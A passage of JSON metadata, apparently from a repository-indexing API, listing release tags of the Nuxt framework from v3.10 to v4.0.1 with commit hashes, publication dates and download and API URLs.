4.0.1/manifests"},{"name":"v4.0.0","sha":"8aacdde48e8388c8bb11b9a5c2f59935341bfcfd","kind":"commit","published_at":"2025-07-15T22:15:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0/manifests"},{"name":"v3.17.7","sha":"b56bc134455391f3ea43d29140162f0b04b615b0","kind":"commit","published_at":"2025-07-13T19:25:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7/manifests"},{"name":"v4.0.0-rc.0","sha":"0344123b3c2c46c6f591c42696eef8ffc6504947","kind":"commit","published_at":"2025-07-07T22:42:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0/manifests"},{"name":"v3.17.6","sha":"9867529347c072efb8da5806f6a973cd853d72e1","kind":"commit","published_at":"2025-07-01T16:46:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6/manifests"},{"name":"v4.0.0-alpha.4","sha":"14dd686b8b47beecf024318ae304919cd81ab4ad","kind":"commit","published_at":"2025-06-27T13:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"8b9e1a1ef774dab5a36a94268439079de1a887de","kind":"commit","published_at":"2025-06-26T16:17:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"4b56bb92b9242df959f091e1d2be72cd492f30ca","kind":"commit","published_at":"2025-06-12T09:16:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2/manifests"},{"name":"v3.17.5","sha":"0fa7ff9908c8a573c1efedf216cdf5ec901820af","kind":"commit","published_at":"2025-06-03T21:38:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5/manifests"},{"name":"v4.0.0-alpha.1","sha":"e379ac3e8dd3b37ca26a01d0dc0ffcbc46ece1aa","kind":"commit","published_at":"2025-06-02T19:45:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1/manifests"},{"name":"v3.17.4","sha":"f7437ce28f83723492a1e540a9b43c56c469234a","kind":"commit","published_at":"2025-05-20T19:57:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4/manifests"},{"name":"v3.17.3","sha":"c6dad342e6718377136c675c64d6e20c420dea81","kind":"commit","published_at":"2025-05-12T13:58:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3/manifests"},{"name":"v3.17.2","sha":"346bb2bfe3324b353ec65d4b2f09b46e0a7c5c71","kind":"commit","published_at":"2025-05-05T08:54:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2/manifests"},{"name":"v3.17.1","sha":"de02d2312d79f0bae4eb382a565253b7ddc98f86","kind":"commit","published_at":"2025-04-29T00:20:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1/manifests"},{"name":"v3.17.0","sha":"fa4618c801a3549b56477b8e880f085f527baf84","kind":"commit","published_at":"2025-04-27T22:38:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0/manifests"},{"name":"v3.16.2","sha":"be46b279d12b2ebca676a9db05244ae64c980f78","kind":"commit","published_at":"2025-04-01T10:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2/manifests"},{"name":"v3.16.1","sha":"cd38de24c14e586b61f742e902ad1e3c2ebd2d31","kind":"commit","published_at":"2025-03-19T16:49:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1/manifests"},{"name":"v3.16.0","sha":"7a37a982535f6da0cef16c4d7d3a81df42429ec1","kind":"commit","published_at":"2025-03-07T14:21:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0/manifests"},{"name":"v3.15.4","sha":"244da170dd61e9aa790d5e9fdf988aa0a128d55a","kind":"commit","published_at":"2025-01-29T08:03:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4/manifests"},{"name":"v3.15.3","sha":"048f974eba45e4909dcf53e8ce692fae3c5db37f","kind":"commit","published_at":"2025-01-24T23:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3/manifests"},{"name":"v3.15.2","sha":"87a0ee59aec69c24a83993dcd329ecc9d25c3df3","kind":"commit","published_at":"2025-01-15T15:16:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2/manifests"},{"name":"v3.15.1","sha":"fdf6e879ea00c9e313458e32dc911ca846a525d4","kind":"commit","published_at":"2025-01-05T12:04:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1/manifests"},{"name":"v3.15.0","sha":"1acc9a0a3adabf250b979e58ed634874a9d90ddd","kind":"commit","published_at":"2024-12-24T23:47:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0/manifests"},{"name":"v3.14.1592","sha":"3894e9d7c1fdeed11ea380cc84f7641d90f52a46","kind":"commit","published_at":"2024-11-19T20:52:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.1592","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.1592","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.1592","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592/manifests"},{"name":"v3.14.159","sha":"625689077052ccbea0812defe34e13edb4ca0983","kind":"commit","published_at":"2024-11-06T11:34:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.159","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.159","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.159","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159/manifests"},{"name":"v3.14.0","sha":"42420521c7eaf3480191f990e4fb545954f8f551","kind":"commit","published_at":"2024-11-04T15:46:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0/manifests"},{"name":"v3.13.2","sha":"a50725300f31ca590f0dd4db16db97e3af9a0b18","kind":"commit","published_at":"2024-09-15T21:03:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2/manifests"},{"name":"v3.13.1","sha":"9983e83dae92195e58812e2a106dc9660e0cb559","kind":"commit","published_at":"2024-09-04T09:39:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1/manifests"},{"name":"v3.13.0","sha":"74ef96d096d0045fd00fccd880c1dbbfea51e22a","kind":"commit","published_at":"2024-08-22T16:03:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0/manifests"},{"name":"v3.12.4","sha":"4a1349f700aa6af14253de7363acf243ecad2c02","kind":"commit","published_at":"2024-07-18T22:30:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4/manifests"},{"name":"v3.12.3","sha":"a9fcd82d8eeaf750205838a4e96e9478f18a154f","kind":"commit","published_at":"2024-07-02T15:05:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3/manifests"},{"name":"v2.18.1","sha":"81f5335f26b4f593004a503f2ec7d9a6fd723b64","kind":"tag","published_at":"2024-06-28T11:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1/manifests"},{"name":"v2.18.0","sha":"9f5fc19018ae2d6c9afe2ece12d86cba7bbed8f8","kind":"tag","published_at":"2024-06-27T15:41:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0/manifests"},{"name":"v3.12.2","sha":"8578e2bd62bdf3ce9dab70c7241a3953feb043b7","kind":"commit","published_at":"2024-06-16T07:36:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2/manifests"},{"name":"v2.17.4","sha":"5b437353d0ae6972e7a35a47feb8062949daf625","kind":"tag","published_at":"2024-06-14T13:46:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4/manifests"},{"name":"v3.12.1","sha":"41fc45da254408921972ab626101c41cea70de32","kind":"commit","published_at":"2024-06-11T10:50:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1/manifests"},{"name":"v3.12.0","sha":"9f06842fa1b323bd0e0911b0335a091a9052b5c3","kind":"commit","published_at":"2024-06-11T08:44:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0/manifests"},{"name":"@nuxt/ui-templates@1.3.3","sha":"a16107b93bad4fd5a25d48598967e11b59b7baf3","kind":"tag","published_at":"2024-04-05T12:43:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3/manifests"},{"name":"v3.11.2","sha":"3c90aaf8e21955cf0644df2e0b09e3e33441e8e2","kind":"commit","published_at":"2024-04-04T16:04:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2/manifests"},{"name":"@nuxt/ui-templates@1.3.2","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2/manifests"},{"name":"@nuxt/ui-assets@0.2.1","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1/manifests"},{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0